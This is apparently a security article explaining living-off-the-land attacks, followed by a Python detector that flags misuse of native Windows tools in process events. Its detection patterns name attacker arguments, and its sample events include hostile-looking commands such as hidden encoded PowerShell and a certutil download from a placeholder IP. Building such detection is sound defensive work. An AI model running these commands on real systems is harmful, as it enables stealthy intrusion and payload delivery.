How to Evict Attackers Living Off Your Land

Why invest in top-shelf malware only to have it turned away by antivirus tools again and again? Why launch that kind of cyberattack at all when your target is already full of perfectly good attack tools, just waiting for you?

More and more threat actors are coming to that conclusion. As cyber defenses improve, adversaries are shifting to stealthy “living-off-the-land” (LotL) attacks that defy many automated security measures.

Here are some ways to begin countering the threat.

The term “living off the land” refers to fileless, malware-less attacks that turn a system’s own native tools against it. Attackers use perfectly legitimate programs and processes to carry out malicious activity, blending into the network’s normal traffic and hiding among legitimate processes to pull off a stealthy compromise.

“Traditionally, attackers have exploited a target environment and then pushed their own tools onto target machines, including backdoors, rootkits, harvesting tools, and more,” says Ed Skoudis, a security veteran and instructor with the SANS Institute. “With living-off-the-land techniques, the attacker uses the compromised machine itself, and components of its operating system, to attack that system further and to spread to other machines in the environment. So the compromised machine’s operating system becomes, in essence, the attacker’s toolkit. The attacker uses its resources and place on the network to undermine the entire targeting environment.”
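Because the binaries involved are legitimate, defenders cannot simply block them; the distinguishing signal is context, such as which process launched a native tool and what arguments it was given. The following is an added example, not code from the article or from SANS, that scores process-creation events on exactly those two signals. The event fields (parent image, image, command line) are assumed to come from an EDR or Sysmon-style feed, and the sample events are constructed for illustration.

```python
"""Flag living-off-the-land (LotL) abuse in process-creation events.

Added example, not from the article. Event shape (parent image, image,
command line) is an assumed EDR/Sysmon-style feed; sample events below
are constructed, including the placeholder encoded PowerShell payload.
"""
import re
from dataclasses import dataclass
from typing import List, Tuple


@dataclass(frozen=True)
class ProcessEvent:
    host: str
    parent_image: str
    image: str
    command_line: str


def basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


# Document handlers and browsers that have no legitimate reason to spawn
# script hosts or download utilities.
DOCUMENT_PARENTS = {
    "winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
    "acrord32.exe", "chrome.exe", "msedge.exe", "firefox.exe",
}

# Native tools commonly repurposed by attackers ("LOLBins").
SCRIPT_HOSTS = {
    "powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
    "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe",
    "bitsadmin.exe", "wmic.exe",
}

# Argument patterns that are rare in legitimate administration but common
# in LotL tradecraft (encoded/hidden PowerShell, certutil as a downloader,
# script hosts pointed at URLs).
_PS_ARGS = re.compile(
    r"-e(nc|ncodedcommand)?\s|-w(indowstyle)?\s+hidden|downloadstring|"
    r"invoke-expression|\biex\b", re.I)
SUSPICIOUS_ARGS = {
    "powershell.exe": _PS_ARGS,
    "pwsh.exe": _PS_ARGS,
    "certutil.exe": re.compile(r"-urlcache|-decode|-encode", re.I),
    "bitsadmin.exe": re.compile(r"/transfer|/addfile", re.I),
    "mshta.exe": re.compile(r"https?://|javascript:|vbscript:", re.I),
    "regsvr32.exe": re.compile(r"/i:https?://|scrobj\.dll", re.I),
    "rundll32.exe": re.compile(r"javascript:|https?://", re.I),
    "wmic.exe": re.compile(r"process\s+call\s+create|/format:", re.I),
}


def classify(ev: ProcessEvent) -> List[str]:
    """Return the reasons an event looks like LotL abuse (empty if benign)."""
    reasons = []
    parent, image = basename(ev.parent_image), basename(ev.image)
    if parent in DOCUMENT_PARENTS and image in SCRIPT_HOSTS:
        reasons.append(f"document/browser parent {parent} spawned {image}")
    pattern = SUSPICIOUS_ARGS.get(image)
    if pattern and pattern.search(ev.command_line):
        reasons.append(f"{image} invoked with suspicious arguments")
    return reasons


def analyze(events) -> List[Tuple[str, str, str]]:
    """Return (host, image, reason) for every suspicious event."""
    return [(ev.host, basename(ev.image), r)
            for ev in events for r in classify(ev)]


# Constructed sample feed: two benign admin actions, two abuse patterns.
SAMPLE_EVENTS = [
    ProcessEvent("ws-01", r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"powershell.exe -File C:\Scripts\inventory.ps1"),  # benign
    ProcessEvent("ws-07", r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4A..."),  # placeholder payload
    ProcessEvent("ws-07", r"C:\Windows\System32\cmd.exe",
                 r"C:\Windows\System32\certutil.exe",
                 r"certutil.exe -urlcache -split -f http://203.0.113.10/update.txt C:\Users\Public\u.txt"),
    ProcessEvent("srv-03", r"C:\Windows\System32\services.exe",
                 r"C:\Windows\System32\certutil.exe",
                 r"certutil.exe -verify -urlfetch C:\certs\leaf.cer"),  # benign
]

if __name__ == "__main__":
    for host, image, reason in analyze(SAMPLE_EVENTS):
        print(f"{host}: {image}: {reason}")
```

The benign PowerShell and certutil invocations pass untouched, while the Word-spawned encoded PowerShell is flagged twice (parent and arguments) and the certutil download once. In production the same logic belongs in the EDR or SIEM rule engine, with the parent and argument lists tuned against a baseline of the organization’s own administrative activity.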